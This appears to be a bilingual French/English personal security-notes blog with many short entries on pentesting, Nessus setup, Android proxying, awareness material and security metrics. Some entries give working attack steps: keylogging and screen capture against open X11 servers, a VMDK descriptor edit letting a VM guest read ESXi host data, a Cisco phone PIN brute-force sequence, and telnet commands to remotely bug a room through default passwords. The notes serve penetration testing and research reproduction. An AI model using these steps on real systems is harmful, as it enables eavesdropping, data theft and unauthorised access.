Ce blog n'est pas mort! | I'm still here! :-0

Je dois vraiment me remettre à prendre des notes ici. Dernièrement je suis devenu paresseux en ne créant que des tweets sans valeur ajoutée.

I really should continue taking infosec notes here. Lately, I've been lazy and I've only created tweets without value-add.

Attaque de serveur X11 sans authentification (après xhost +)

Voici quelques commandes pour exploiter un serveur X11 ouvert:

Capture de clés à distance (remote key capture)
$ xkey IP:0.0

NB:

• Le code source pour xkey.c peut être trouvé ici
• Utiliser 0.0 pour le port 6000, 1.0 pour le port 6001...

 
Capture de l'écran (screen capture):
$ xwd -display IP:0.0 -root -silent -out /tmp/screendump
$ xv /tmp/screendump 
$ xwd -display IP:0.0 -root -silent | xwdtopnm | pnmtopng > Screenshot.png


Références:

• Hack computer: X11 (6000 TCP) 
• Hacking Linux Exposed

Secure Salted Password Hashing - How to do it Properly

Secure Salted Password Hashing - How to do it Properly

Analysis of Android app traffic through Burp Suite

Good summary here

Related articles

• How to import cert on Android
• Good ref on analysis of some iOS apps
• Fix in Burp to handle Android proxying
• Setting up Burp for listener cert
• Thread on Burp forum
• Episode307 on PaulDotCom

Forcing Firefox to remember passwords

The Firefox configuration setting wallet.crypto.autocompleteoverride  allows the override of the autocomplete="off" so that passwords are always remembered. This may be useful where Greasemonkey isn't available (i.e. on Android). I'll need to test this...

Of course, this needs to be used with caution (on a test system, if Firefox isn't the default browser...).

As said, on a desktop, a better option is to use a Greasemonkey script or modify the nsLoginManager.js file.

Ref: Wallet.crypto.autocompleteoverride - MozillaZine Knowledge Base

Accessing Security Logs Remotely and Efficiently

Good article on accessing security logs remotely and efficiently.

There's also the older Event Comb tool (Eventcombmt.exe), a multi-threaded tool that can be used to gather specific events from the Event Viewer logs of different computers at the same time: Microsoft KB

IOS games audit

iOS | ceriksen.com

Galaxy Samsung S3 Debloating

My debloat list for SGS3 with Rogers Wireless

Other Refs
Apps Safe to Remove on Samsung Galaxy S3 (Sprint Version, Stock Rooted)
Good list, no comments for apk's

T-Mobile Galaxy Note II General > List of apps for Debloating and "Android OS" Battery Hogging
Good list, battery drain fix with mediaserver, sugg. Media Fix Root

Galaxy Y GT-S5360 General > [LIST] System Apps that are SAFE* to remove!
Great list, with comment for each apk

Samsung Galaxy S3 - Spreadsheet of applications safe to remove
I think it's based on the S2 spreadsheet, all apk's with comments

Spreadsheet of  Galaxy S apk-list-what-you-need-and-dont-need

SGS2 removable spreadsheet

Freezing GS3 Bloat with Titanium Backup!

Forum for AT&T, Rogers, Bell, Telus Samsung Galaxy S III

Stealing host data from a VMware vSphere 5.0 VM

This post in inspired by the Insinuator site's presentation on an attack on public IaaS clouds (+ follow-up post) that support VM uploads and that are based on VMware ESXi 5.0. Essentially, it's about a VM guest being able to read files on the ESXi host after abusing a VMDK Descriptor File's content.

I wanted to check if this is really a problem (i.e. the whole attack path being valid) or if this post was just something half-baked or simple "food for thought".

Reproducing this in my own environment 

Here, I'll try to reproduce what the above post did while checking that this is really a problem with VMware. I mean, this will only be a problem if exporting/importing the VM to/from OVF format works. In other words, if VMware performs clean-up/validation of while deploying OVF files, this alleged vulnerability may be irrelevant.

Test Environment: ESXi  5.0.0 #1 SMP Release build-474610 Aug 26 2011 13:51:17 x86_64)

Step 1: Simulate the stealing of the host's volume details from a Debian guest

On ESXi host:

• Connect to ESXi server using VMware vSphere Client 5.0
• Create a small Debian 6.0.3 Server VM
• SSH to ESXi hypervisor (SSH Server has to be turned on) - 

Here we will work on the host's files directly instead of exporting them to a different format (ie: OVF, OVA...) and then reimporting them.

• Edit resulting vmdk descriptor file (on the ESXi host directly). Added line in blue:

/vmfs/volumes/4e5bfad0-283f8ee6-1b9d-b499ba04496a/Small and temporary VM for Eric # vi Small\ and\ temporary\ VM\ for\ Eric.vmdk
# Disk DescriptorFile
version=1
encoding="UTF-8"
CID=f7fc44b3
parentCID=ffffffff
isNativeSnapshot="no"
createType="vmfs"

# Extent description
RW 2097152 VMFS "Small and temporary VM for Eric-flat.vmdk"
RW 32 VMFS "/bootbank/state.tgz"[...]

• Back in vSphere client, start the Debian VM
• SSH to VM or use the vSphere Client to get into the VM's console
• Multiply the VMFS size above by the block size of 512: 2097152 * 514 = 1073741824  (OFFSET)
• 
  
• Create new loopback device that points after the VMDK: losetup -v -o OFFSET -f /dev/sda 
• Use loopback device to extract data: tar -x -i --ignore-command-error --ignore-failed-read -z -f /dev/loop0 
• Extract files in the gzip package: tar -x -i --ignore-command-error --ignore-failed-read -z -f local.tgz [screenshot of above steps]
• Examine the content of the extracted data. Get the device file name from etc/vmware/esx.conf (naa...) [screenshot]
  

Good! we can get host volume details from a guest!

Step 2: Simulate the stealing of a host's volume content from a Debian guest

• In the host's console session, change the vmdk descriptor file as follows (added line in blue), taking into consideration the volume details obtained before:

/vmfs/volumes/4e5bfad0-283f8ee6-1b9d-b499ba04496a/Small and temporary VM for Eric # vi Small\ and\ temporary\ VM\ for\ Eric.vmdk
# Disk DescriptorFile
version=1
encoding="UTF-8"
CID=f7fc44b3
parentCID=ffffffff
isNativeSnapshot="no"
createType="vmfs"

# Extent description
RW 2097152 VMFS "Small and temporary VM for Eric-flat.vmdk"
RW 8386560 VMFSRAW "/dev/disks/naa.600508b1001c1bd269ddc2f549010bad:2"

[...]

• Restart the VM and reestablish a shell session to it
• View the data of the volume [screenshot]
  
  

NB: Although the above steps were successful to demonstrate how a guest could abuse access to data on the host, I could not reproduce the same thing by creating a portable OVF format that could be deployed to the host from a remote vSphere client (simulating a malicious IaaS customer).

However, my testing wasn't exhaustive. I didn't try to craft an OVF package taking into consideration the above. Somehow, I can't imagine that the deployment of such as package (with an absolute path pointing to a known host file/device) would work. Perhaps I should have thought of that before I started all this testing!

Nevertheless, it's not completely impossible that a cloud provider would use a different portable format that would allow this attack vector to work.

Web credential stealing (even HTTPS) via Windows event traces

Mark Bagget a trouvé une méthode pour extraire les détails de session web (même celles utilisant SSL) en activant le tracage Event Tracing for Windows (EVT), incluant le nom d'usager et mot de passe. Les détails sur le wiki de PaulDotCom. Cette méthode a certains prérequis (WinInet API).

Mark Bagget was able to extract web session details (including user credentials using SSL) by turning on some event tracing on a Windows target (i.e. post exploitation tool). This is described on the PaulDotCom show notes at
Episode300 - PaulDotCom Security Weekly. NB: this method has prerequisites (WinInet API usage).

Owasp-montreal email distribution

Register to Montreal's OWASP chapter email distribution here: Owasp-montreal Info Page

Montreal Java User Group

Le Montréal Java User Group (JUG) est un groupe d'utilisateurs Java se réunissant régulièrement afin d'échanger des idées et de discuter des avancées technologiques de la plateforme Java.

Cisco IP Telephony security auditing ideas

Here's some ideas for security auditing a Cisco IP Telephony solution.

Password Auditing

Web UI

Use Burp to send POST requests (for all users) to the Cisco Call Manager login form at https://.../ccmuser/showHome.do

IP phone PIN 

The programmatic approach to test for Phone PIN would use an approach as described here: http://blog.malerisch.net/2012/10/callmanager-pin-bruteforce.html

NB: I haven't done that test automatically to avoid problems (in Prod) but I think that the clean sequence required looks like this:

• Get SIDVAL: /ccmpd/pdCheckLogin.do?name=undefined 
• Try logging in -- if we get XML w/o error, we're good; set pin value to your Org's default: /ccmpd/login.do?sid=SIDVAL&userid=USERID&pin=PIN
• Initiate logout: /ccmpd/pdLogoutPage.do?sid=SIDVAL
• Confirm logout and close session: /ccmpd/logout.do?sid=SIDVAL

 

Test other URIs used by Cisco IP phone

• http://.../ccmcip/xmldirectory.jsp 
• http://.../ccmcip/getservicesmenu.jsp 
• http://.../ccmcip/GetTelecasterHelpText.jsp 
• http://.../ccmcip/authenticate.jsp

Check if IP Phones can be used to remotely bug a (conference) room 

Another test idea is to see if listening in on remote conversations is possible because of unchanged defaults. This is described here http://dorkbyte.com/2010/10/31/cisco-ip-phones-lets-you-remotely-bug-a-room/

Excerpt from above reference (in case the above post disappears):

There exists an interesting “feature” in Cisco IP phones that allows a crafty user to remotely control a Cisco IP phone and set it to call a remote number (if setup to do so) and allow audio to stream normally — in effect allowing someone to remotely audio bug a room. In all fairness, this feature requires the controlling user to know the configured password for the phone which many installations leave the default password of “cisco” set.

To try this out:

1. Telnet to the phone (e.g. “telnet 192.0.2.10″). You may need to bridge your PC to the IP Phone VLAN from within the office (see http://www.linuxjournal.com/article/10821?page=0,2, use VLAN as determined from an IP phone's settings - eg: VLAN 161, IP: 172.16.2.241/255.255.255.127, DHCP server: 172.16.29.10, Host Name: SEPD0C282439930)
2. Enter the password for the phone At the “SIP Phone>” prompt: Start a “test” session with “test open”
3. Virtually take the phone off the hook with “test offhook”
4. Virtually dial the telephone number where the audio stream should go with “test key ” (e.g. “test key 14155556666″) 
5. The phone will start to make the call… Switch to speakerphone with “test key spkr” (to virtually push the Speakerphone key) 
6. Listen to the audio streaming from the phone… 

Présentations du SANS sur la conscientisation des usagers

SANS a mis à notre disposition des présentations pour conscientiser les usagers des TI sur la sécurité informatique. Il en existe déjà au moins une en français.

SANS Security Awareness Presentations:

Securing The Human: takes you step by step how to build a high-impact awareness program that ensures your organization is not only compliant but secure by changing human behavior. Topics include building your Steering Committee, identifying WHO you are targeting in your program, WHAT you want to communicate and HOW. In addition we cover key topics such as updating your program and how to measure it through effective metrics.

• Presentation
• Recorded Webinar

Securing The Kids: for parents to help better understand and how to protect their kids online. We cover the top three risks kids face online and the top five steps you can take to protect them. This course is based on the experiences and lessons learned from a variety of SANS top instructors who not only specialize in security, but are parents just like you.

• Presentation
• Handout

Internet Security Guide For Kids:for parents to present to K-5th graders on how they can safely use the Internet. The information here is similar to the lessons learned in Securing The Kids, but presented in a graphical, kid friendly manner.

• Presentation (Full Slides)
• Presentation (With Notes)

Configurer Nessus pour des balayages d’applications web

Lorsqu’on utilise Nessus pour balayer un site web, il est important de bien configurer les paramètres globaux pour aller chercher le maximum de vulnérabilités.
Le site de support de Tenable contient un bon article qui explique comment on fait. J’ai copié ici-bas les détails (en Anglais).

Sommaire:

• On peut importer des cookies pour faciliter l’accès avec pré-authentification
• Pour obtenir un fichier qui contient des cookies actifs, on peut utiliser Firefox et exporter ses cookies via un ajout tel que Export Cookie
• Il est aussi très important d’ajuster quelques paramètres dans Nessus: Enable CGI scanning, HTTP Cookies import, Web App Test Settings, ajouter des points de départs de balayage dans Web Mirroring, (+ utiliser des plugins qui utilisent ces paramètres)

Problem:

What needs to be configured to ensure a thorough web application audit is performed by Nessus?

Solution:

Tenable encourages users to run a full vulnerability scan with all plugins enabled. If you want to streamline a policy to only focus on a web application, the following steps outline the process for creating a new policy designed to run a web application audit:

1. Create a new policy. (Policies -> Add)
2. Under the “General” tab options, set up a scan as you normally would. Ensure at least one TCP-based port scanner is selected and provide a list of ports with web servers running on the host(s). Note: Only use this method if you are absolutely sure you know of all web servers running on the targets. Otherwise, select a port range so that Nessus can detect web servers and applications to audit.
3. Under the “Plugins” tab, ensure the following plugin families are enabled:
   1. CGI abuses – This plugin family checks for a wide range of commercial and open source applications that have documented vulnerabilities. These checks include software detection, information disclosure, SQL injection, file inclusion, overflows and more.
   2. CGI abuses : XSS – This plugin family checks for a wide range of commercial and open source applications that have documented Cross-site Scripting (XSS) vulnerabilities.
   3. Database – Many web applications will utilize a database for storing large amounts of data. SQL injection attacks are designed to target database servers via web applications.
   4. FTP – Some sites use FTP for administrators to upload web application content or update the application.
   5. General – This plugin family contains plugins that identify operating systems via HTTP, perform a wide variety of SSL checks and more.
   6. Service detection – Contains checks for a wide variety of services and technologies, many of which support web servers and applications.
   7. Web servers – This plugin family contains over 500 checks for vulnerabilities in popular web servers including Apache, Tomcat, IIS and WebSphere. In addition, this plugin family includes checks for frameworks such as PHP, common web server issues associated with the HTTP(S) protocol, OpenSSL checks and more.
4. Under the “Preferences” tab, there are several drop-down menus with additional configuration options that must be specified:
   1. Under “Global variable settings”, select “Enable CGI scanning”. Optionally, the “Thorough tests (slow)” can be enabled and “Report verbosity” can be set to “Verbose” to provide additional vulnerability checks and better reporting.
   2. The “HTTP cookies import” drop-down can be used to import cookies as a means for authenticating to the application. This is not explicitly required, but some means of authentication should be provided.
   3. The “HTTP login page” drop-down provides over a dozen options that direct Nessus to a custom web application. This includes the URL to the login page (e.g., /application/login.php), login form (i.e., if the login data is sent to a different location), relevant form fields for authentication (the “user” and “pass” variables should be changed to reflect your application, %USER% and %PASS% are pulled from the “Login configurations” drop-down menu) and options that control how Nessus behaves in relation to the authentication process.
   4. The “Login configurations” can be used if the application is protected using HTTP Basic Authentication, Digest or NTLM.
   5. The “Web Application Tests Settings” drop-down contains several important options for enabling testing of custom applications. The “Enable web applications tests” must be enabled, or Nessus will only scan for known vulnerabilities based on prior public disclosures. This page also contains options for limiting the time to test an application, use of POST requests, the type of argument values to use (refer to the Nessus User Guide for additional information on this option) and more.
   6. The “Web mirroring” drop-down directs Nessus’ behavior for mirroring the application, a step performed before tests are calculated and run. The total number of pages or depth of mirroring can be controlled, along with the starting page and a delimited list of regular expressions that are used to match web pages that Nessus will exclude (e.g., logout|emailus.php).

For more information about the settings you can watch our instructional videos at:
http://www.youtube.com/watch?v=fUCgvZnTILo
http://www.youtube.com/watch?v=B5qvVT9iho0
Additionally, you can find detailed information on the preferences in the Nessus User Guide.
Other Refs:

• From the Discussions Forum, another related post regarding the use of cookie importing: https://discussions.nessus.org/thread/4395

• The missing link in the Nessus docs is that to get the cookie file, you need to use Firefox and export using an add-on such as: https://addons.mozilla.org/en-US/firefox/addon/export-cookies/?src=api

• Also very important is to tweak a few settings in Nessus: Enable CGI scanning, HTTP Cookies import, Web App Test Settings, Web Mirroring starting points (+ choose some plugins that use these)

Comment cloner une puce logicielle SecurID (software token)

Sensepost a démontré sur son blog la semaine passée comment un attaquant déterminé peut dévier la protection offerte par les soft-tokens SecurID. On peut déduire les valeurs secrètes (seed) si on prend contrôle d’un système (ex.: vol de matériel, logiciels malveillants).

Last week’s blog post by SensePost’s Behrang Fouladi demonstrated another way determined attackers could in certain cases circumvent protections built into SecurID.

By reverse engineering software used to manage the cryptographic software tokens on computers running Microsoft’s Windows operating system, he found that the secret “seed” was easy for people with control over the machines to deduce and copy. He provided step-by-step instructions for others to follow in order to demonstrate how easy it is to create clones that mimic verbatim the output of a targeted SecurID token.

“When the above has been performed, you should have successfully cloned the victim’s software token and if they run the SecurID software token program on your computer, it will generate the exact same random numbers that are displayed on the victim’s token,” Fouladi wrote.

Attention aux gestionnaires de mots de passe intégrés aux Navigateurs

Cet article montre un parfait exemple pourquoi on doit éviter d’utiliser les gestionnaires intégrés (trop automatisés) dans les navigateurs web.

--

The article Abusing Password Managers with XSS « Neohapsis Labs is the perfect example for why we avoid using automated password submission features in web browsers (either built-in, plugins or other tools). We somehow need to reach a balance between security and ease-of-use.

Installer les ajouts nécessaires pour VirtualBox dans BT5R2

Voici un site qui m’a aidé a installer les additions pour VirtualBox dans Backtrack 5 R2.

Here’s a site that helped me install the VirtualBox Guest Additions in Backtrack 5 R2.

Installer Nessus 5.0 dans Backtrack 5 R2

Ce site m’a aidé à installer Nessus 5.0.0 sous Backtrack 5 R2.

This site has helped me install Nessus 5.0.0 within my Backtrack 5 R2 VM.

OpenDNS – Parental Controls

À utiliser sur votre réseau domestique, les services de protection de OpenDNS.com. Il y a plusieurs options gratuite mais j’aime particulièrement le service OpenDNS HomeVIP qui coûte que 20$/an. Cette option permet d’obtenir des rapports sur notre utilisation de notre service Internet. Plus d’information ici: OpenDNS – Parental Controls.

--

Everybody should be using this service at home: OpenDNS – Parental Controls.
There are various options but I particularly like the HomeVIP option. It costs 20$/year but it provides reporting that is very useful to understand your Internet usage.

DNSRecon

See Episode273 – PaulDotCom Security Weekly.

Nessus, IID & botnet detection

Brought to you by Tenable…
Nessus uses data provided by Internet Identity IID, a company that maintains a list of hosts it has determined through various technical means are part of a botnet. Nessus does not perform the technical checks itself; rather it compares the IP addresses being scanned against a list maintained by IID. Inclusion in IID’s list is typically accurate, they experience a very low rate of false positives.
If a host is reported as part of a botnet, there are several things you can do to help validate the finding and respond to the issue:

1. Check the host against additional third-party lists to determine if the host shows up in those resources: http://isc.sans.edu/sources.html, http://www.malwaredomains.com, http://www.ipvoid.com
2. Check the host against known Unsolicited Bulk E-mail UBE/spam blacklists: http://www.dmoz.org/Computers/Internet/E-mail/Spam/Blacklists
3. Look for any evidence of the host being compromised e.g., suspicious activity, newly installed software, machine resources being heavily utilized.
4. Perform a full vulnerability scan to determine if any high-risk or critical vulnerabilities are present, that may represent the point of intrusion. Ensure web application auditing is enabled, as Nessus can identify malicious web content related to botnet activities.
5. Move the host to an isolated network and use a network sniffer to monitor traffic being sent from the machine.

If you still have questions about your host appearing in the list, you can contact IID at activeknowledge.signals.requests@internetidentity.com with questions. Your initial mail should include the IP address in question, when the IP was reported i.e., when you ran your Nessus scan and any additional information about the host that may be relevant.via Tenable Customer Support Portal (for registered users).

Clonage de cartes d’accès “Prox” et RFID

Voici un site intéressant qui montre comment cloner des cartes d’accès sans contact (proximity card). L’autre donne ses schémas électroniques et ses techniques de clonage.

Here’s a very interesting site that demonstrates how to clone contactless proximity cards. The author provides electronic schematics and cloning techniques.

Installer Google Chrome Frame dans Internet Explorer

Voici où on doit aller pour installer Google Chrome Frame, le module pour Internet Explorer. Pour en savoir davantage sur cette façon d’utiliser Chrome à même Internet Explorer, on peut aller ici pour une bonne introduction. Ceci permet, par exemple, d’obtenir les extensions HTML5.

Here’s where to go for installing Google Chrome Frame. To know more about this mechanism to use Chrome from within Internet Explorer, we can go here for a good intro. Adding this IE module will, for instance, allow you to use HTML5 extensions.

Vérifier la performance d’un site web

Le site WebPagetest offre plusieurs options pour vérifier la performance d’un site web afin de l’optimiser.

The WebPagetest site provides a great way to check a web site’s performance.

Qu’avez-vous à perdre?

Qu’a-t’on a perdre lors d’une attaque informatique? Ça dépend de notre secteur d’activité mais en général

Réputation et marque de commerce Attention négative du public Perte de revenus future	Viabilité financière Coûts reliés aux investigations internes et à la gestion des crises Pénalités de non conformité et de divulgation Diminution de la valeur à la Bourse
Propriété intellectuelle Divulgation d’information confidentielle, de vos processus, de votre liste de clients…	Confidentialité et partenaires Poursuite en justice Perte de confiance des clients et partenaires

Vulnérabilité wifi via WPS

Voici des détails sur la vulnérabilité qui permettrait de pratiquement court-circuiter la sécurité WPA/WPA-2 lorsque “wifi protected setup” est activé (sur certains modèles).  Un chiffrier est en construction (par la communauté) qui contient des résultats de tests de la vulnérabilité.

NB: j’ai essayé Reaver 1.3 avec peu de succès avec un DLink DIR-655. L’outil fonctionne en lui spécifiant un PIN spécifique pour obtenir le secret partagé (PSK). Mais après approximativement 60 à 80 requêtes pour deviner (bruteforce) le PIN, le DLink n’accepte plus d’essais sans une réinitialisation du routeur, ce qui rend l’attaque inutile. Selon mes tests (avec quelques autres modèles/manufacturiers), je crois que ce problème serait peut-être plus généralisé qu’on l’imagine…

Here’s some details on the vulnerability that allows the bypass of WPA/WPA-2 security when a Wireless Access Point has “WIFI Protected Setup” enabled (for certain models & manufacturers). A spreadsheet is currently in construction with the results of WPS Vulnerability Testing (by the security community). My testing with a DLink DIR655 have been non conclusive – i.e. the device doesn’t appear to be vulnerable.

ZeuS utiliserait des techniques P2P

Selon cet article, Zeus utiliserait des techniques P2P pour déjouer la défense.

ZeuS Gets More Sophisticated Using P2P Techniques | abuse.ch.

Mozilla Firefox about:config

Mozilla Firefox permet la configuration de beaucoup de paramètres qui ne sont pas tous disponibles via son interface usager. Pour y parvenir, on entre about:config dans l’addresse. Mais que veulent dire toutes les paramètres et valeurs associées? Pour répondre à cette question, on peut consulter cet article sur Mozillazine.org.

Here is a reference to the entries in about:config, where all user preferences in Mozilla Firefox can be viewed and modified.

Mesurer la sécurité – Security measures

Voici quelques références qui aident dans les mesures en sécurité informatique.

Refs related to the measurement of security (KPIs, KRIs, KCIs)

1. NIST SP800-55: Perf. Measurement Guide for Infosec (see Appendix A for examples)
2. NIST SP800-53: Assessing Security Controls, Building Effective Security Assessment Plans
3. NIST SP800-40: Section 3 – Security Metrics for Patch & Vulnerability Mgmt
4. NIST Maturity Levels: High-level security program maturity
5. ISO 27004:2009:  IT Security Techniques – Infosec Mgmt – Measurement – top-down & bottom-up approach to security metrics, in line with other 27K standards
6. ISO 21827:2008: IT Security techniques – Systems Security Engineering- Capability Maturity Model (SSE-CMM)
7. Security Metrics: Replacing Fear, Uncertainty and doubt book
8. DOD’s Measuring Security:  published in 2009, compares NIST, ISO, ISACA… refers to other sources:

• NIST and ISO guidelines/standards mentioned above
• ISACA’s Developing metrics for effective Infosec Governance
• ISACA’s How can security be measured?
• securitymetrics.org‘s Metrics Catalog – eventually takes you to https://www.metricscenter.net/